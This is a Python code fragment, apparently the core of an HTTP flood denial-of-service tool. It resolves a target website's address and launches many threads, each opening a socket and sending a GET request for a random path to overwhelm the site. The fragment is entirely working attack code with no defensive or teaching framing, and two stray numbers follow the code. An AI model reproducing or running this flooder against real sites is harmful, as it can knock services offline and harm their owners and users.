    thread_num_mutex = threading.Lock()

    # Utility function
    def print_status() -> None:
        # `thread_num` lives in the enclosing `attack` scope, so it must be
        # declared nonlocal (a bare `global` here would raise a NameError).
        nonlocal thread_num

        thread_num_mutex.acquire(True)
        thread_num += 1
        print(f"\n[{time.ctime().split(' ')[3]}] [{str(thread_num)}] Under progress...")
        thread_num_mutex.release()

    def generate_url_path():
        msg = str(string.ascii_letters + string.digits + string.punctuation)
        data = "".join(random.sample(msg, 5))
        return data

    def attack_() -> None:
        print_status()
        url_path = generate_url_path()

        dos = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        try:
            dos.connect((ip, port))
            msg = f"GET /{url_path} HTTP/1.1\nHost: {host}\n\n"
            dos.send(msg.encode())
        except socket.error:
            print(f"[ERROR] Site may be down | {socket.error}")
        finally:
            try:
                dos.shutdown(socket.SHUT_RDWR)
            except OSError:
                pass  # The socket never connected; nothing to shut down.
            dos.close()

    try:
        host = host.replace("https://", "").replace("http://", "").replace("www.", "")
        ip = socket.gethostbyname(host)
    except socket.gaierror:
        print("[ERROR] Make sure you entered a correct website!")
        sys.exit(2)

    all_threads = []

    for i in range(request_count):
        # The worker is `attack_`; targeting `attack` itself would call it
        # again without arguments.
        t1 = threading.Thread(target=attack_)
        t1.start()
        all_threads.append(t1)

        time.sleep(0.01)

    for current_thread in all_threads:
        current_thread.join()
2.890625
3